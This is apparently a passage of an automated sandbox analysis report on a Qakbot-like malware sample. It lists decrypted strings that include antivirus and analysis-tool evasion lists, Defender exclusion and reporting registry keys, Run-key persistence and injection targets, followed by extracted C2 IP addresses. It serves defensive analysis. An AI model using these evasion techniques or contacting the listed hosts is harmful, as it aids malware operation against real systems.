Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: LOCALAPPDATA
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: cmd.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: APPDATA
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: select
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: mcshield.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: advapi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ws2_32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .cfg
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_Product
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: WQL
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wininet.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: LastBootUpTime
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: urlmon.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Create
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_PnPEntity
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Initializing database...
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: winsta0\default
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .dat
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: WBJ_IGNORE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: next
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wpcap.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: image/pjpeg
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: fmon.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: vbs
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aswhooka.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SysWOW64
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: mpr.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: image/gif
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: crypt32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ntdll.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: open
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SystemRoot
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: cscript.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: C:\INTERNAL\__empty
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_PhysicalMemory
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: image/jpeg
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: LocalLow
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: displayName
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: shlwapi.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CommandLine
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: kernel32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SubmitSamplesConsent
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: 1234567890
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wbj.go
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_DiskDrive
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: System32
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Name
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: WRSA.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: c:\\
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SpyNetReporting
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: FALSE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aswhookx.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Packages
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: application/x-shockwave-flash
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: RepUx.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Winsta0
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: avp.exe;kavtray.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: root\SecurityCenter2
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: MsMpEng.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: userenv.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: csc_ui.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: \\.\pipe\
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: pstorec.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: NTUSER.DAT
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: from
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: netapi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: gdi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: setupapi.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: iphlpapi.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CrAmTray.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_ComputerSystem
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: user32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: \sf2.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: egui.exe;ekrn.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Software\Microsoft
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %S.%06d
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: bcrypt.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wtsapi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: shell32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: TRUE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_Bios
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: c:\hiberfil.sysss
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: /
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ByteFence.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: type=0x%04X
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: snxhk_border_mywnd
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ROOT\CIMV2
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: https
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: fshoster32.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: kernelbase.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: regsvr32.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %s\system32\
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_Process
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: LOCALAPPDATA
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: cmd.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: APPDATA
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: select
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: mcshield.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: advapi32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ws2_32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .cfg
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_Product
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: WQL
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wininet.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: LastBootUpTime
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: urlmon.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Create
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Win32_PnPEntity
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Initializing database...
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: winsta0\default
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: .dat
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: WBJ_IGNORE
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: next
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: wpcap.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: image/pjpeg
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: fmon.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: vbs
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: aswhooka.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: SysWOW64
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: mpr.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: image/gif
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: crypt32.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: ntdll.dll
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: open
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C0B0 mv_cast5_crypt2,	4_2_1000C0B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000B0D0 mv_camellia_crypt,	4_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10013100 mv_encryption_init_info_alloc,mv_mallocz,mv_mallocz,mv_mallocz,mv_mallocz,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_calloc,	4_2_10013100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C1B0 mv_cast5_crypt,	4_2_1000C1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100132D0 mv_encryption_init_info_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,	4_2_100132D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002480 mv_aes_ctr_crypt,mv_aes_crypt,	4_2_10002480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10013480 mv_encryption_init_info_get_side_data,mv_encryption_init_info_alloc,mv_free,mv_free,mv_free,mv_free,mv_free,	4_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100084B0 mv_blowfish_crypt,mv_blowfish_crypt_ecb,mv_blowfish_crypt_ecb,	4_2_100084B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10032510 mv_get_random_seed,BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,mvpriv_open,_read,_close,mvpriv_open,_read,_close,clock,clock,mv_sha_init,mv_sha_update,mv_sha_final,mv_log,abort,	4_2_10032510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10002523 mv_aes_crypt,	4_2_10002523
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004D583 mv_twofish_crypt,	4_2_1004D583
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001363B mv_encryption_init_info_alloc,	4_2_1001363B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000867B mv_blowfish_crypt_ecb,	4_2_1000867B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100136FB mv_encryption_init_info_alloc,	4_2_100136FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10013860 mv_encryption_init_info_add_side_data,mv_malloc,mv_malloc,	4_2_10013860

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 103.42.86.42:995
Source: Malware configuration extractor	IPs: 174.4.89.3:443
Source: Malware configuration extractor	IPs: 161.142.103.187:995
Source: Malware configuration extractor	IPs: 78.160.146.127:443
Source: Malware configuration extractor	IPs: 84.35.26.14:995
Source: Malware configuration extractor	IPs: 12.172.173.82:20
Source: Malware configuration extractor	IPs: 70.28.50.223:2078
Source: Malware configuration extractor	IPs: 124.149.143.189:2222
Source: Malware configuration extractor	IPs: 70.160.67.203:443
Source: Malware configuration extractor	IPs: 186.64.67.30:443
Source: Malware configuration extractor	IPs: 103.123.223.133:443
Source: Malware configuration extractor	IPs: 94.207.104.225:443
Source: Malware configuration extractor	IPs: 89.114.140.100:443
Source: Malware configuration extractor	IPs: 213.64.33.61:2222
Source: Malware configuration extractor	IPs: 86.176.144.234:2222
Source: Malware configuration extractor	IPs: 72.134.124.16:443
Source: Malware configuration extractor	IPs: 47.34.30.133:443
Source: Malware configuration extractor	IPs: 109.50.149.241:2222
Source: Malware configuration extractor	IPs: 85.104.105.67:443
Source: Malware configuration extractor	IPs: 81.111.108.123:443
Source: Malware configuration extractor	IPs: 86.173.2.12:2222
Source: Malware configuration extractor	IPs: 188.28.19.84:443
Source: Malware configuration extractor	IPs: 41.228.224.161:995
Source: Malware configuration extractor	IPs: 12.172.173.82:50001
Source: Malware configuration extractor	IPs: 178.175.187.254:443
Source: Malware configuration extractor	IPs: 65.95.141.84:2222
